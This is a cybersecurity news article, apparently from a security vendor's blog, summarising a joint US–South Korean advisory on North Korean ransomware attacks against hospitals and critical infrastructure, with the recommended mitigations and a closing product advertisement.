Contents:
U.S. and South Korean cybersecurity and intelligence agencies warned in a joint advisory that North Korean hackers are launching ransomware attacks against healthcare and critical infrastructure facilities to fund illicit activities.
The attacks, which demand cryptocurrency ransoms in exchange for recovering access to encrypted files, are mainly designed to support North Korea’s objectives.
In their joint advisory, the authorities claim that the attacks include…
…cyber operations targeting the United States and South Korea governments — specific targets include Department of Defense Information Networks and Defense Industrial Base member networks.
The North Korean APT
For years, North Korean threat actors have been linked to espionage, financial theft, and cryptojacking operations, such as the WannaCry ransomware attack of 2017, which at that point was one of the most devastating cyber-attacks ever seen.
In 2022, North Korean hackers stole virtual assets estimated to be worth between $630 million and $1 billion, according to a new UN report, which said the increasingly sophisticated techniques are meant to gain access to digital networks involved in cyberfinance, as well as steal information from governments, companies, and individuals that could be useful in North Korea’s nuclear and ballistic missile programs.
As part of their attack chains, the hacker crew exploits known security flaws in Apache Log4j (CVE 2021-44228), SonicWall (CVE-2021-20038), and TerraMaster NAS appliances (CVE-2022-24990) in order to gain initial access, followed by reconnaissance, lateral movement, and ransomware deployment.
According to THN, threat actors have also been observed using off-the-shelf tools such as BitLocker, DeadBolt, ech0raix, Jigsaw, and YourRansom to encrypt files, as well as impersonating other ransomware groups. Inclusion of DeadBolt and ech0raix marks the first time government agencies have formally tied the ransomware strains to a specific adversary.
An alternative method to distribute the malware is via trojanized files of a messenger app called X-Popup in attacks targeting small and medium-size hospitals in South Korea.
Mitigations
Among the mitigations recommended in the advisory, the authorities mentioned:
- Limit access to data by authenticating and encrypting connections, such as using public key infrastructure certificates in virtual private network (VPN) and transport layer security (TLS) connections.
- Implement the principle of least privilege by using standard user accounts on internal systems instead of administrative accounts, which grant excessive system administration privileges.
- Turn off weak or unnecessary network device management interfaces, such as Telnet, SSH, Winbox, and HTTP for wide area networks (WANs) and secure with strong passwords and encryption when enabled.
- Protect stored data by masking the permanent account number (PAN) when displayed and rendering it unreadable when stored—through cryptography, for example.
- Implement and enforce multi-layer network segmentation with the most critical communications and data resting on the most secure and reliable layer.
- Use monitoring tools to observe whether IoT devices are behaving erratically due to a compromise.
For more relevant steps, you can find the full report here.
Heimdal™ Ransomware Encryption Protection
- Blocks any unauthorized encryption attempts;
- Detects ransomware regardless of signature;
- Universal compatibility with any cybersecurity solution;
- Full audit trail with stunning graphics;
Can Heimdal® Help You?
The answer is Yes! Heimdal`s Ransomware Encryption Protection is universally compatible with any antivirus solution and 100% signature-free, ensuring superior detection and remediation of all types of ransomware.
A unified dashboard and agent ensure exceptional endpoint protection, monitoring, and response with all of our cybersecurity solutions.
If you liked this article, follow us on LinkedIn, Twitter, Facebook, YouTube, and Instagram for more cybersecurity news and topics.
Do you work for an NHS Trust? Heimdal is giving you free ransomware licenses to combat growing cyber attacks.
Get your free ransomware protection here.